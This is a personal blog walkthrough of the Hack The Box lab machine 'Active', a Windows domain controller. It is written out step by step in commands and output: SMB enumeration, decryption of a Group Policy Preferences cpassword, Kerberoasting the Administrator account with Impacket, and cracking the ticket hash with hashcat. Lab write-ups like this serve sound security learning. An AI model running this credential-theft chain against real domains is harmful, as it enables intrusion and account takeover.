For my second blog I tackled the Active box on Hack the Box.
Started off running the standard NMAP scan. After opening up the out file there is a lot available. Haven’t stumbled upon too many boxes that aren’t web servers, but this one is definitely not based on the ports. That said, it looks like we’re facing a Windows 2008 server with SMB, Kerberos, and LDAP (domain controller?) all running.
kali@kali:~/htb/active$ nmap -sC -sV 10.10.10.100 -o nmapActiveStarting Nmap 7.91 ( https://nmap.org ) at 2020-10-22 23:54 EDT
Nmap scan report for 10.10.10.100
Host is up (0.025s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-23 03:55:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-10-23T03:56:34
|_ start_date: 2020-10-23T03:52:08
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.69 seconds
First thing to attempt is an anonymous smbmap scan. I tend to waffle between using this tool vs. smbclient, but went with smbmap this time. Looking at the results, I have access to the “Replication” share.
kali@kali:~/htb/active$ smbmap -u '' -p '' -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Use -R with smbmap to recursively dump the Replication share. Lots of output and for some reason it didn’t follow all folder paths completely… Strange.
kali@kali:~/htb/active$ smbmap -u '' -p '' -d active.htb -R 'Replication' -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
Tried again on the various sub folders (cut out the non-interesting one to save some space) and found the groups directory and groups.xml file in the Policies folder. Based on some previous research (Thanks Sean Metcalf for all your AD work), we know that these files can sometimes contain password.
kali@kali:~/htb/active$ smbmap -u ‘’ -p ‘’ -d active.htb -R ‘Replication\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\’ -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
— — — — — — — — — — — -
Replication READ ONLY
.\Replicationactive.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\*
dr — r — r — 0 Sat Jul 21 06:37:44 2018 .
dr — r — r — 0 Sat Jul 21 06:37:44 2018 ..
dr — r — r — 0 Sat Jul 21 06:37:44 2018 Groups
.\Replicationactive.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\*
dr — r — r — 0 Sat Jul 21 06:37:44 2018 .
dr — r — r — 0 Sat Jul 21 06:37:44 2018 ..
fr — r — r — 533 Sat Jul 21 06:38:11 2018 Groups.xml
Download the file… Drum-roll please.
kali@kali:~/htb/active$ smbmap -u '' -p '' -d active.htb --download 'Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml' -H 10.10.10.100[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)[+] File output to: /home/kali/htb/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
And there it is! I’ve got a username some form of password hash.
kali@kali:~/htb/active$ cat Groups.xml <?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Not 100% sure what kind of hash this is so it’s time to google. Searched, “Microsoft group policy password hash” and found that it is most likely a GPP hash (Thanks Sean, again). First tool that comes up is Gpp-decrypt and it’s already on kali — time to get to cracking. Throw the hash in and there we go, we have a password! Now time to keep poking.
kali@kali:~/htb/active$ gpp-decrypt
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
Try smbmap with the new user and password combo.
kali@kali:~/htb/active$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYThe Users share immediately sticks out. Dug in and holy output from the smb recursive command, but reading through there’s a gem at the bottom.
kali@kali:~/htb/active$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -H 10.10.10.100 -R 'Users'
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Users READ ONLY
.\Users\*
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 All Users
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Default
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Default User
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
.\Users\Default\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 AppData
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Cookies
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Desktop
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Documents
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Downloads
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Favorites
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Links
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Local Settings
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Documents
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 NetHood
fr--r--r-- 262144 Mon Jul 30 09:47:52 2018 NTUSER.DAT
fr--r--r-- 1024 Mon Jul 16 17:01:17 2018 NTUSER.DAT.LOG
fr--r--r-- 95232 Mon Jul 30 09:47:52 2018 NTUSER.DAT.LOG1
fr--r--r-- 0 Mon Jul 16 17:08:47 2018 NTUSER.DAT.LOG2
fr--r--r-- 65536 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 PrintHood
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Recent
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Saved Games
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 SendTo
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Templates
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Videos
.\Users\Default\AppData\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Local
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Roaming
.\Users\Default\AppData\Local\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temp
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Temporary Internet Files
.\Users\Default\AppData\Local\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Local\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 GameExplorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temporary Internet Files
.\Users\Default\AppData\Roaming\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
.\Users\Default\AppData\Roaming\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Internet Explorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Quick Launch
.\Users\Default\AppData\Roaming\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Cookies
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Network Shortcuts
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Printer Shortcuts
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Recent
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 SendTo
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Templates
.\Users\Default\Documents\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Videos
.\Users\SVC_TGS\*
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 .
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 ..
dr--r--r-- 0 Sat Jul 21 11:14:20 2018 Contacts
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 Desktop
dr--r--r-- 0 Sat Jul 21 11:14:28 2018 Downloads
dr--r--r-- 0 Sat Jul 21 11:14:50 2018 Favorites
dr--r--r-- 0 Sat Jul 21 11:15:00 2018 Links
dr--r--r-- 0 Sat Jul 21 11:15:23 2018 My Documents
dr--r--r-- 0 Sat Jul 21 11:15:40 2018 My Music
dr--r--r-- 0 Sat Jul 21 11:15:50 2018 My Pictures
dr--r--r-- 0 Sat Jul 21 11:16:05 2018 My Videos
dr--r--r-- 0 Sat Jul 21 11:16:20 2018 Saved Games
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 Searches
.\Users\SVC_TGS\Desktop\*
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 ..
fr--r--r-- 34 Sat Jul 21 11:14:42 2018 user.txtGrab that flag and send it in.
kali@kali:~/htb/active$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -d active.htb --download '.\Users\SVC_TGS\Desktop\user.txt' -H 10.10.10.100Next, I tried crackmap exec to see if I could pop a shell, but nothing. No write permissions, unfortunately.
Looking back at the scan we know the box has LDAP and Kerb running. Let’s enumerate with Impacket modules and see what I can find (Another shoutout needed here to Tim Medin for his kerberoasting webinars).
kali@kali:~/htb/active$ GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------
Administrator 2018-07-18 2018-07-30
Guest <never> <never>
krbtgt 2018-07-18 <never>
SVC_TGS 2018-07-18 2020-10-22
Found some users and attempted the password with them and crackmapexec, but no dice. Time to try another module to see if we can grab a hash. And there it is! (Note: Command output copied poorly into the code box below so I did some formatting.)
kali@kali:~/htb/active$ GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------------------------------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$eb5cdb347c259df2a2ae1572f267eadd$da32dde320019bc6cccdd561ec91062f9eb85df077e58510485028a178eaac87f1b7b2846cc8a681d30427be635cad8060c22e85161ccdf3a335f8f79f74aa8fd76d585858a5d69ad1dcf689da4045090b48eecc3a5f9022e89f714a18e046611a0fecfab0357beb83cb6110b8425f9342c29f56b053f101a324c63ee9291750ad189a77172e5c79cea69b69984d35681cec730ea9b99926db410becf9fa040474d770ad9e242e8017f06cc39ae818a1fcfd91499bedd550106553f891d8c33950b6877e64640f2e4675f51930ce195389e454d4f998eadaa68c0101de3b58474488c1d9efe01765fbc8d4a69b7cfa64aa33140703d46db1249212b0620383913f77062e0756c00c361da7e48d3fd14b405825aaaa5784c4856db8ae75d85b5abeddeacf6c70e10c82069252082dfc38b6b4ef9c6fa05b8828089f24e6013dcfc7f97b247bd922e7b0afbef39164a990d1a03867bea1d5d04a485938cb01c08465fefff1a39730cab6f15df73c4010179b213695fcfaada00fc24c14477769762a263e980f7d86752fab827dd4f56fa61de81672835c4c5ab35123a94a84cab1bb1c21702908f50c79c524ccbac309614d211dca11b6b667fb99b801a9a65d5763c47abdcf6992508ad6752381333cdbf18ba9b889dc3f9ad3a79c4d467b5900e46ddd27be1296d683734c5bef11ae3096b18ed01d307f0e5b9fa9b81b241ea8a283f11f7ed42e07f4bec7f236c1df2834abc30cc3fc8a6654b0c49daa5945c13513ce4ecd089f3ae09cc867084fdb56a05d688c3bc11ab757ca9af1a67cefc33d1f1a1a5205b60686a6a2c47bfe1cb51ed8b7041936354cd55f4b5e30eb7485f4d844572d81d707b4d7adcb943810063d1e4266e8cb0339a7fb24a4c8bac56969795ce945016e5021f366c8de42ad2e735f62fe04f3a7f52d8d62fdaf119e752493247181932c65423a766331f5983086b736540350f81810f9ecbd5543162089e9b8e14d333023b3c5af0751e6c3d372876c1a5fafbce9be34f833675283d8f3f09f0088d64977e297fc67a8b2ffab60d63eccbeaa03db4184da7ca4c277112577d46cdf3b27e0f62fd0a4fb839dc09f7310722c65fab18b8f573b4f46b2ecc855b7c0c9ce769d2153fd029d8986217498913693f6064a7cc8720df030cee693ae87cbd686f4de63fc3d3fcee213cdd7157d1bcf9203308804978798119abda5ea5a9dcc7da57b9d689e6b0c7080aea83127f4971053abad98ID’d the hash as (Kerberos 5 TGS-REP etype 23). Throw the hash into hash cat and…
kali@kali:~/htb/active$ hashcat -a 0 -m 13100 hash.txt ~/rockyou.txt --forceWe get a hit!
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$eb5cdb347c259df2a2ae1572f267eadd$da32dde320019bc6cccdd561ec91062f9eb85df077e58510485028a178eaac87f1b7b2846cc8a681d30427be635cad8060c22e85161ccdf3a335f8f79f74aa8fd76d585858a5d69ad1dcf689da4045090b48eecc3a5f9022e89f714a18e046611a0fecfab0357beb83cb6110b8425f9342c29f56b053f101a324c63ee9291750ad189a77172e5c79cea69b69984d35681cec730ea9b99926db410becf9fa040474d770ad9e242e8017f06cc39ae818a1fcfd91499bedd550106553f891d8c33950b6877e64640f2e4675f51930ce195389e454d4f998eadaa68c0101de3b58474488c1d9efe01765fbc8d4a69b7cfa64aa33140703d46db1249212b0620383913f77062e0756c00c361da7e48d3fd14b405825aaaa5784c4856db8ae75d85b5abeddeacf6c70e10c82069252082dfc38b6b4ef9c6fa05b8828089f24e6013dcfc7f97b247bd922e7b0afbef39164a990d1a03867bea1d5d04a485938cb01c08465fefff1a39730cab6f15df73c4010179b213695fcfaada00fc24c14477769762a263e980f7d86752fab827dd4f56fa61de81672835c4c5ab35123a94a84cab1bb1c21702908f50c79c524ccbac309614d211dca11b6b667fb99b801a9a65d5763c47abdcf6992508ad6752381333cdbf18ba9b889dc3f9ad3a79c4d467b5900e46ddd27be1296d683734c5bef11ae3096b18ed01d307f0e5b9fa9b81b241ea8a283f11f7ed42e07f4bec7f236c1df2834abc30cc3fc8a6654b0c49daa5945c13513ce4ecd089f3ae09cc867084fdb56a05d688c3bc11ab757ca9af1a67cefc33d1f1a1a5205b60686a6a2c47bfe1cb51ed8b7041936354cd55f4b5e30eb7485f4d844572d81d707b4d7adcb943810063d1e4266e8cb0339a7fb24a4c8bac56969795ce945016e5021f366c8de42ad2e735f62fe04f3a7f52d8d62fdaf119e752493247181932c65423a766331f5983086b736540350f81810f9ecbd5543162089e9b8e14d333023b3c5af0751e6c3d372876c1a5fafbce9be34f833675283d8f3f09f0088d64977e297fc67a8b2ffab60d63eccbeaa03db4184da7ca4c277112577d46cdf3b27e0f62fd0a4fb839dc09f7310722c65fab18b8f573b4f46b2ecc855b7c0c9ce769d2153fd029d8986217498913693f6064a7cc8720df030cee693ae87cbd686f4de63fc3d3fcee213cdd7157d1bcf9203308804978798119abda5ea5a9dcc7da57b9d689e6b0c7080aea83127f4971053abad98:Ticketmaster1968I checked smbmap on my first attempt, but I could have also ran crackmapexec to check if I could own the user and then run psexec.py. Ultimately, both paths will get the flag, just one with an actual shell :)
kali@kali:~/htb/active$ smbmap -u 'Administrator' -p 'Ticketmaster1968' -d active.htb -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: 10.10.10.100
[|] Work[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\GTHVPIQGDO, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
Run another recursive smbmap command on the Users sharewith admin creds.
.\Users\Administrator\Desktop\*
dw--w--w-- 0 Mon Jul 30 09:50:10 2018 .
dw--w--w-- 0 Mon Jul 30 09:50:10 2018 ..
fr--r--r-- 282 Mon Jul 30 09:50:10 2018 desktop.ini
fr--r--r-- 34 Sat Jul 21 11:06:06 2018 root.txtAnd grab the flag — box owned!
kali@kali:~/htb/active$ smbmap -u 'Administrator' -p 'Ticketmaster1968' -d active.htb --download 'Users\Administrator\Desktop\root.txt' -H 10.10.10.100If you made it this far, thank you for reading! I am attempting to put out one blog a week as I go through old boxes so check back for more HTB write-ups.
